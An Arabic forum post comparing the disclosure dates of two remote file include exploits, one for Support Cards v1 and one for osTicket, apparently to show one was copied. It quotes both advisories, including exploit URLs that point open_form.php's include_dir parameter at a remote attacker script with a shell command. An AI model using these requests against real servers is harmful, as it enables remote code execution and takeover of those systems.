شوف مقارنه بين تاريخ الاكتشافين....
أولا : فريق team : site-down
كود PHP:
file include exploit in Support Cards v1 May 30 2006 08:26PM
black code (black-cod3 hotmail com)
file include exploit in Support Cards v1
forum type : Support cards v1
bug found by : sweet-devil
team : site-down
type : file include
####################################################
exploit :
http://www.example.com/support/include/open_form.php?include_dir=http://
ursite/evilscript.txt?cmd=pwd
####################################################
#######################
emails:
black-cod3 (at) hotmail (dot) com [email concealed] & gamr-14 (at) hotmail (dot) com [email concealed]
#######################
All my respect to our friends , lezr.com , g123g.net
done .. peace
ولو تلاحظ تاريخ الإكتشاف May 30 2006 08:26PM يعني 30 / 5 / 2006 ونحن الآن في 14 / 10 /2006
ام بنسبة للأخ rUnViRuS
كود PHP:
WDT:- osTicket File Include all V Oct 14 2006 12:26AM
stormhacker hotmail com
script:- osTicket Open Source Support Ticket System
site:- http://www.osticket.com
exploit by runvirus
http://www.host/path/include/open_form.php?include_dir=
welcome in www.sec-area.com
ولو تلاحظ تاريخ الإكتشاف أمس بالصباح الساعه 12 14 / 10 /2006 فرق شاسع بين الإكتشاف الأول واالثاني
